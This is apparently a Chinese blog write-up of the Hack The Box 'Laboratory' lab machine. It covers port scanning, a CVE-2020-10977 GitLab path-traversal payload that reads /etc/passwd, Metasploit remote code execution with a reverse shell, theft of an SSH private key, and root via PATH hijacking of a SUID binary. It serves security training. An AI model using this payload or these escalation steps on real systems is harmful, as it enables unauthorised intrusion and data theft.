HTB::Laboratory

实验环境

info

渗透过程

0x01 信息搜集

masscan进行快速端口扫描:

masscan -p1-65535 10.10.10.216 --rate=1000
Starting masscan 1.3.2 (http://bit.ly/14GZzcT) at 2021-04-17 08:10:08 GMT
Initiating SYN Stealth Scan
Scanning 1 hosts [65535 ports/host]
Discovered open port 80/tcp on 10.10.10.216
Discovered open port 22/tcp on 10.10.10.216
Discovered open port 443/tcp on 10.10.10.216

开放22、80、443端口

nmap 进行指定开放端口扫描:

nmap -sC -sV -p$ports --min-rate=100 10.10.10.216
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-17 16:13 CST
Nmap scan report for laboratory.htb (10.10.10.216)
Host is up (0.57s latency).

PORT    STATE SERVICE  VERSION
22/tcp  open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 25:ba:64:8f:79:9d:5d:95:97:2c:1b:b2:5e:9b:55:0d (RSA)
|   256 28:00:89:05:55:f9:a2:ea:3c:7d:70:ea:4d:ea:60:0f (ECDSA)
|_  256 77:20:ff:e9:46:c0:68:92:1a:0b:21:29:d1:53:aa:87 (ED25519)
80/tcp  open  http     Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to https://laboratory.htb/
443/tcp open  ssl/http Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: The Laboratory
| ssl-cert: Subject: commonName=laboratory.htb
| Subject Alternative Name: DNS:git.laboratory.htb
| Not valid before: 2020-07-05T10:39:28
|_Not valid after:  2024-03-03T10:39:28
| tls-alpn:
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.19 seconds

443端口存在两个网站:https://laboratory.htbhttps://git.laboratory.htb

whatweb:

whatweb

0x02 过程

CVE-2020-10977

默认首页为静态页面,首先使用@laboratory.htb注册gitlab并登录:

gitlab

得到gitlab版本,查找相关漏洞:

gitlabrce

Hackerone中有针对此漏洞的分析:

Hackone

利用步骤:

![a](/uploads/11111111111111111111111111111111/../../../../../../../../../../../../../../etc/passwd)

随便建立一个新project test,在项目中创建issue,中填入以下payload:

issue

再新建另一个test1,将刚才的issue move到test1中,此时可以点击下载passwd文件:

file

获得passwd:

passwd

RCE:

RCE

使用MSF进行利用:

msfinfo

获得反弹shell:

rshell

user.txt

登录进入后发现为git用户,尝试修改gitlab管理员用户密码:

dexter

成功登录,在后台发现用户私钥:

id_rsa

复制到本地通过SSH进行登录:

user.txt

root.txt

发现todo文件,猜测可以利用docker进行提权:

todo

使用提权辅助工具:

提权辅助

发现docker-security存在是SUID执行程序,使用ltrace来跟踪进程调用库函数的情况 :

ltrace

做了2次chmod

It’s using chmod without specify the full path /usr/bin/chmod

So This is exploited by Path-Hijacking.

If you don’t known about PATH-HIJACKING read this article.

Linux Privilege Escalation Using PATH Variable

因为没有使用完整路径/usr/bin/chmod,所以我们可以通过增加环境变量的方式劫持这个路径,进行提权:

提权

成功得到root.txt。

Reference

CVE-2020-10977

路径劫持

【推广】 免费学中医,健康全家人
原文地址:https://www.cnblogs.com/chalan630/p/14705167.html